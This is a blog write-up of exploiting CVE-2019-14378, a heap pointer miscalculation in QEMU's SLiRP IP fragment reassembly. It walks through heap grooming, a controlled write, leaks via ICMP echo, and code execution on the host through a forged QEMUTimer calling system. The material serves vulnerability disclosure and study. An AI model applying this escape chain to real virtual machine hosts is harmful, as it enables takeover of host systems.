tl;dr
This post describes how I exploited CVE-2019-14378, a pointer miscalculation in the network backend of QEMU. The bug is triggered when large fragmented IPv4 packets are reassembled for processing. It was found by code auditing.
Vulnerability Details
There are two parts to networking within QEMU:
- The virtual network device that is provided to the guest (e.g. a PCI network card).
- The network backend that interacts with the emulated NIC (e.g. puts packets onto the host’s network).
By default, QEMU creates a SLiRP user network backend and an appropriate virtual network device for the guest (e.g. an e1000 PCI card).
The bug was found in the packet reassembly in SLiRP.
IP fragmentation
IP fragmentation is an Internet Protocol (IP) process that breaks packets into smaller pieces (fragments), so that the resulting pieces can pass through a link with a smaller maximum transmission unit (MTU) than the original packet size. The fragments are reassembled by the receiving host.
- Flags: 3 bits
  - Bit 0: reserved, must be zero
  - Bit 1: (DF) 0 = May Fragment, 1 = Don’t Fragment.
  - Bit 2: (MF) 0 = Last Fragment, 1 = More Fragments.
- Fragment Offset: 13 bits
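To make the bit layout concrete, here is a minimal sketch that decodes the 16-bit flags/offset word of an IPv4 header. The mask values follow the layout above; the `frag_info` type and the helper names are hypothetical and are not taken from SLiRP. The word is assumed to be already converted to host byte order.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Masks for the 16-bit flags/fragment-offset word (host byte order). */
#define IP_RF      0x8000u /* bit 0: reserved, must be zero */
#define IP_DF      0x4000u /* bit 1: Don't Fragment */
#define IP_MF      0x2000u /* bit 2: More Fragments */
#define IP_OFFMASK 0x1fffu /* low 13 bits: offset in 8-byte units */

/* Hypothetical helper type for this example, not part of SLiRP. */
struct frag_info {
    bool dont_fragment;
    bool more_fragments;
    uint32_t byte_offset; /* fragment offset converted to bytes */
};

/* Decode the flags/offset word (already in host byte order). */
static struct frag_info decode_frag_word(uint16_t ip_off_host)
{
    struct frag_info fi;
    fi.dont_fragment = (ip_off_host & IP_DF) != 0;
    fi.more_fragments = (ip_off_host & IP_MF) != 0;
    fi.byte_offset = (uint32_t)(ip_off_host & IP_OFFMASK) * 8u;
    return fi;
}

/* A packet is a fragment if MF is set or its offset is non-zero. */
static bool is_fragment(uint16_t ip_off_host)
{
    return (ip_off_host & (IP_MF | IP_OFFMASK)) != 0;
}
```

A first fragment has MF set and offset 0; the last fragment has MF clear and a non-zero offset. Both count as fragments and go through reassembly.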
1 | struct mbuf { |
The mbuf structure is used to store the IP layer information received. It has two buffers: m_dat, which is inside the structure, and m_ext, which is allocated on the heap if m_dat is too small to store the packet.
For NAT translation, fragmented incoming packets must be reassembled before they are edited and retransmitted. This reassembly is done by the ip_reass(Slirp *slirp, struct ip *ip, struct ipq *fp) function, where ip contains the current IP packet data and fp is a linked list containing the fragmented packets.
ip_reass does the following:
- If this is the first fragment to arrive (fp==NULL), create a reassembly queue and insert ip into this queue.
- Check whether the fragment overlaps with previously received fragments, and if so discard it.
- If all the fragments have been received, reassemble them. Create the header for the new IP packet by modifying the header of the first packet.
1 | /* |
The bug is in the calculation of the variable delta. The code assumes that the first fragment is never stored in the external buffer (m_ext). The calculation q - m->m_dat is valid when the packet data is inside mbuf->m_dat, because q (the structure containing the linked list of fragments and the packet data) then lies inside m_dat. If the m_ext buffer was allocated instead, q lies inside the external buffer and the calculated delta is wrong.
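The arithmetic can be illustrated with a small model. This is only a sketch: a flat array stands in for the heap so the pointer arithmetic stays well defined, and the offsets (`M_DAT_OFF`, `M_EXT_OFF`, `HDR_OFF`) are made-up values, not the real layout. `rebase()` mirrors the fix-up described above.

```c
#include <assert.h>
#include <stddef.h>

/* One flat array stands in for the process heap so that all pointer
 * arithmetic below stays inside a single object. */
static char heap[0x4000];

/* Hypothetical layout, chosen only for illustration. */
#define M_DAT_OFF 0x1000 /* where the mbuf's inline buffer m_dat starts */
#define M_EXT_OFF 0x2000 /* where the external buffer m_ext starts */
#define HDR_OFF   0x30   /* q sits this far into the buffer in use */

/* The fix-up step: rebase q from m_dat onto m_ext. */
static char *rebase(char *q, char *m_dat, char *m_ext)
{
    ptrdiff_t delta = q - m_dat; /* only meaningful if q is inside m_dat */
    return m_ext + delta;
}

/* Case the code expects: q still points into m_dat.
 * Returns the offset of the rebased q within the model heap. */
static ptrdiff_t rebased_offset_when_q_in_dat(void)
{
    char *m_dat = heap + M_DAT_OFF;
    char *m_ext = heap + M_EXT_OFF;
    return rebase(m_dat + HDR_OFF, m_dat, m_ext) - heap;
}

/* Buggy case: q already points into m_ext, so delta also contains
 * the distance between the two buffers. */
static ptrdiff_t rebased_offset_when_q_in_ext(void)
{
    char *m_dat = heap + M_DAT_OFF;
    char *m_ext = heap + M_EXT_OFF;
    return rebase(m_ext + HDR_OFF, m_dat, m_ext) - heap;
}
```

In the second case the result is off by exactly m_ext - m_dat, so whoever controls the distance between the two buffers controls where q ends up. If the external buffer lies below m_dat, that distance is negative.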
1 | slirp/src/ip_input.c:ip_reass |
Later, the newly calculated pointer q is converted into an ip structure and its fields are modified. Because of the wrong delta, ip points to an incorrect location, and ip_src and ip_dst can be used to write controlled data to that location. This may also crash QEMU if the calculated ip lies in an unmapped area.
Exploitation
What are we facing
- If we control delta, we can write controlled data relative to m->m_ext. For that we need precise control over the heap.
- We need leaks to bypass ASLR.
- There are no useful function pointers on the heap to get code execution, so we have to get an arbitrary write.
Controlling Heap
Let’s look into how heap objects are allocated in slirp.
1 | // How much room is in the mbuf, from m_data to the end of the mbuf |
m_get, m_free, m_inc and m_cat are wrappers for handling dynamic memory allocation. When a new packet arrives, a new mbuf object is allocated. If m_dat is large enough to store the packet data, it is used; otherwise a new external buffer is allocated with m_inc and the data is copied into it.
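The inline-versus-external decision can be sketched with a reduced model. Everything here is an assumption made for illustration: `mini_mbuf` keeps only a few fields, `INLINE_SIZE` is far smaller than SLiRP's real buffer, the flag value is arbitrary, and `mini_inc` only approximates what m_inc does.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

#define M_EXT_FLAG  0x01 /* hypothetical flag value: data lives in m_ext */
#define INLINE_SIZE 64   /* hypothetical inline capacity */

/* Simplified stand-in for SLiRP's struct mbuf (most fields omitted). */
struct mini_mbuf {
    int   m_flags;
    int   m_size;  /* capacity of the active buffer */
    char *m_data;  /* current start of packet data */
    int   m_len;   /* bytes of packet data */
    char *m_ext;   /* heap buffer, valid only when M_EXT_FLAG is set */
    char  m_dat[INLINE_SIZE];
};

static void mini_init(struct mini_mbuf *m)
{
    memset(m, 0, sizeof *m);
    m->m_size = INLINE_SIZE;
    m->m_data = m->m_dat;
}

/* Make sure at least `size` bytes fit after m_data.
 * Returns 0 on success, -1 if allocation fails. */
static int mini_inc(struct mini_mbuf *m, int size)
{
    char *base = (m->m_flags & M_EXT_FLAG) ? m->m_ext : m->m_dat;
    int gap = (int)(m->m_data - base);

    if (m->m_size - gap >= size)
        return 0; /* already enough room */

    if (m->m_flags & M_EXT_FLAG) {
        /* realloc may hand back the same chunk if it is big enough */
        char *p = realloc(m->m_ext, (size_t)size + (size_t)gap);
        if (!p)
            return -1;
        m->m_ext = p;
    } else {
        char *p = malloc((size_t)size + (size_t)gap);
        if (!p)
            return -1;
        memcpy(p, m->m_dat, (size_t)m->m_size); /* move inline data out */
        m->m_ext = p;
        m->m_flags |= M_EXT_FLAG;
    }
    m->m_data = m->m_ext + gap;
    m->m_size = size + gap;
    return 0;
}

static void mini_free(struct mini_mbuf *m)
{
    if (m->m_flags & M_EXT_FLAG)
        free(m->m_ext);
}
```

Once the flag is set, m_data no longer points into the structure itself, which is the situation the delta calculation in ip_reass does not account for.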
1 | slirp/src/ip_input.c:ip_input |
If the incoming packet is fragmented, a new mbuf object is used to store the fragments (fp) until all of them arrive. When the next fragment arrives, it is enqueued onto this list.
This gives us a good primitive for allocating chunks of controlled size ( > 0x608 ) on the heap. A few things to keep in mind: for every packet an mbuf (0x670) is allocated, and if it is the first fragment then another mbuf is allocated for the fragment queue (fp).
1 | malloc(0x670) |
We can use this to spray the heap, so that subsequent allocations are taken from the top chunk, which gives us a predictable heap state.
Getting controlled write on heap
Now that we can control the heap, let’s see how we can use the bug to overwrite something useful.
1 | q = fp->frag_link.next; // Points to first fragment |
Assume this heap state
1 | +------------+ |
Now delta will be -padding. It is added to m->m_ext, and later we can write at that offset. Thus, by controlling this padding we control delta.
When all the fragments arrive, they are concatenated into one mbuf object with the m_cat function.
1 | slirp/src/muf.c |
m_inc calls realloc, which returns the same chunk if it can accommodate the requested size. So even after the packets are reassembled, we get the same m->m_ext buffer as the first packet. Note that m_ext is allocated for the first fragment, so q points inside this buffer. The addition of -padding is then also relative to q, which makes things a bit easier.
1 | +------------+ |
So after the pointer calculation, q will be pointing to target.
1 | slirp/src/ip_input.c:ip_reass |
Since we control fp->ipq_src and fp->ipq_dst, which are the source and destination IP addresses of the packet, we can overwrite the target’s contents.
Arbitrary Write
My initial target was to overwrite the m_data field, so that we could use the packet reassembly’s m_cat() to get an arbitrary write, but that turned out not to be possible due to alignment and offset issues.
1 | slirp/src/muf.c:m_cat |
But I was able to overwrite the m_len field of the object. Since there is no check in the m_cat function, we can use m_len to get a write relative to m_data. This avoids the alignment issue, and we use it to overwrite the m_data of a different object to get an arbitrary write.
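The effect of a corrupted m_len on an unchecked append can be shown with a toy model. This is a sketch under stated assumptions: the `arena` array, the offsets and `unchecked_cat` are hypothetical stand-ins, and only the memcpy to m_data + m_len reflects the behaviour described above.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Flat array standing in for a stretch of heap memory. */
static unsigned char arena[256];

#define BUF_A_OFF  0   /* data buffer of the mbuf being appended to */
#define VICTIM_OFF 128 /* neighbouring object with a pointer-like field */

/* Append src at dst_data + m_len, trusting m_len blindly.
 * Returns the new length. */
static int unchecked_cat(unsigned char *dst_data, int m_len,
                         const unsigned char *src, int src_len)
{
    memcpy(dst_data + m_len, src, (size_t)src_len);
    return m_len + src_len;
}

/* Place a known value in the victim field, run the append with the
 * given (possibly corrupted) length, and return the victim field. */
static uint64_t demo_overwrite(int m_len, uint64_t new_value)
{
    uint64_t victim_field = 0x1111111111111111ull;
    memcpy(arena + VICTIM_OFF, &victim_field, sizeof victim_field);

    unchecked_cat(arena + BUF_A_OFF, m_len,
                  (const unsigned char *)&new_value,
                  (int)sizeof new_value);

    memcpy(&victim_field, arena + VICTIM_OFF, sizeof victim_field);
    return victim_field;
}
```

With an honest length the victim is untouched. With a length equal to the distance between the buffer and the victim, the appended bytes land exactly on the victim field.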
- Send a packet with id 0xdead and the MF bit set (1).
- Send a packet with id 0xcafe and the MF bit set (1).
- Trigger the bug to overwrite m_len of 0xcafe so that m_data + m_len points to 0xdead’s m_data.
- Send a packet with id 0xcafe and the MF bit unset (0) to trigger reassembly and overwrite 0xdead’s m_data with the target address.
- Send a packet with id 0xdead and the MF bit unset (0), which writes the content of this packet to m_data.
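Each step above sends a fragment whose IPv4 header carries a chosen id and MF bit. The sketch below shows how such a header could be filled in. The helper names, the TTL of 64 and the absence of IP options are assumptions made for this example, and the sending code is omitted entirely.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IPV4_HDR_LEN 20
#define IP_MF 0x2000u /* More Fragments bit in the flags/offset word */

/* Write 16-bit and 32-bit values in network (big-endian) byte order. */
static void put16(uint8_t *p, uint16_t v)
{
    p[0] = (uint8_t)(v >> 8);
    p[1] = (uint8_t)v;
}

static void put32(uint8_t *p, uint32_t v)
{
    put16(p, (uint16_t)(v >> 16));
    put16(p + 2, (uint16_t)v);
}

/* Internet checksum (RFC 1071) over len bytes. */
static uint16_t inet_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)data[i] << 8) | data[i + 1];
    if (len & 1)
        sum += (uint32_t)data[len - 1] << 8;
    while (sum >> 16)
        sum = (sum & 0xffffu) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Fill a 20-byte IPv4 header for one fragment (no options).
 * byte_offset must be a multiple of 8. */
static void build_frag_header(uint8_t hdr[IPV4_HDR_LEN], uint16_t id,
                              int more_fragments, uint16_t byte_offset,
                              uint16_t payload_len, uint8_t proto,
                              uint32_t src, uint32_t dst)
{
    uint16_t off = (uint16_t)((more_fragments ? IP_MF : 0u) |
                              (byte_offset / 8u));

    memset(hdr, 0, IPV4_HDR_LEN);
    hdr[0] = 0x45;                       /* version 4, header length 5 words */
    put16(hdr + 2, (uint16_t)(IPV4_HDR_LEN + payload_len));
    put16(hdr + 4, id);                  /* fragments of one packet share id */
    put16(hdr + 6, off);                 /* flags + fragment offset */
    hdr[8] = 64;                         /* TTL, arbitrary choice */
    hdr[9] = proto;
    put32(hdr + 12, src);
    put32(hdr + 16, dst);
    put16(hdr + 10, inet_checksum(hdr, IPV4_HDR_LEN));
}
```

Fragments that share an id (and source, destination and protocol) are queued together, which is why two different ids give two independent reassembly queues.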
Getting Leaks
We need leaks to bypass ASLR and PIE. For that we need some way to transfer data back to the guest. It turns out that there is a very common service that matches that description exactly: ICMP echo request. The SLiRP gateway responds to ICMP echo requests, reflecting back the payload of the packet (after the ICMP headers) unchanged.
We have an arbitrary write, but where do we write, since no addresses are known at this point? We can do a partial overwrite of m_data and write data onto the heap.
Leaks:
- Use the arbitrary write to create a fake ICMP header on the heap.
- Send an ICMP request with the MF bit set (1).
- Partially overwrite m_data to point to the fake header on the heap.
- Send the packet with the MF bit set to 0 to end the ICMP request.
- Receive leaks from the host.
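A partial overwrite works because pointers are stored little-endian on x86-64: replacing only the lowest bytes moves the pointer within the same region without knowing its upper bytes. The sketch below models this on an explicit byte array. The helper names and the number of bytes overwritten are assumptions for illustration, not values taken from the exploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store v as 8 little-endian bytes, the in-memory layout on x86-64. */
static void store_le64(uint8_t out[8], uint64_t v)
{
    for (int i = 0; i < 8; i++)
        out[i] = (uint8_t)(v >> (8 * i));
}

static uint64_t load_le64(const uint8_t in[8])
{
    uint64_t v = 0;
    for (int i = 0; i < 8; i++)
        v |= (uint64_t)in[i] << (8 * i);
    return v;
}

/* Overwrite only the n lowest-addressed bytes of a stored pointer
 * and return the resulting pointer value. */
static uint64_t partial_overwrite(uint64_t ptr, const uint8_t *bytes, size_t n)
{
    uint8_t mem[8];
    store_le64(mem, ptr);
    for (size_t i = 0; i < n && i < 8; i++)
        mem[i] = bytes[i];
    return load_le64(mem);
}
```

The upper bytes, which are the part randomized by ASLR, are left as they were, so the result still points into the heap.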
Getting Code Execution
Timers (more precisely QEMUTimers) provide a means of calling a given routine (a callback) after a time interval has elapsed, passing an opaque pointer to the routine.
main_loop_tlg is an array in bss that contains the QEMUTimerList associated with the different timers. Each of these contains a list of QEMUTimer structures. QEMU loops through them to check whether any have expired; if so, the cb function is called with the argument opaque.
RIP control:
- Create a fake QEMUTimer with system as the callback and opaque as its argument.
- Create a fake QEMUTimerList that contains our fake QEMUTimer.
- Overwrite the main_loop_tlg entry with the fake QEMUTimerList.
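Why this yields control of the instruction pointer can be seen from a reduced model of the timer dispatch. The structures below are simplified stand-ins, not the real QEMUTimer and QEMUTimerList definitions, and the callback is a harmless function that only records its argument.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef void timer_cb(void *opaque);

/* Simplified stand-ins; the real QEMU structures have more fields. */
struct mini_timer {
    int64_t expire_time;
    timer_cb *cb;
    void *opaque;
    struct mini_timer *next;
};

struct mini_timer_list {
    struct mini_timer *active_timers;
};

/* Call cb(opaque) for every expired timer at the head of the list.
 * Returns the number of timers fired. */
static int run_timers(struct mini_timer_list *tl, int64_t now)
{
    int fired = 0;
    struct mini_timer *t;

    while ((t = tl->active_timers) != NULL && t->expire_time <= now) {
        tl->active_timers = t->next; /* unlink before calling */
        t->next = NULL;
        t->cb(t->opaque);
        fired++;
    }
    return fired;
}

/* Harmless callback used for the demonstration. */
static const char *last_arg;

static void record_arg(void *opaque)
{
    last_arg = opaque;
}
```

The dispatcher calls whatever cb holds with whatever opaque holds, so a list entry made of attacker-chosen values turns into a call to a chosen function with a chosen argument.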
You can find the full exploit at CVE-2019-14378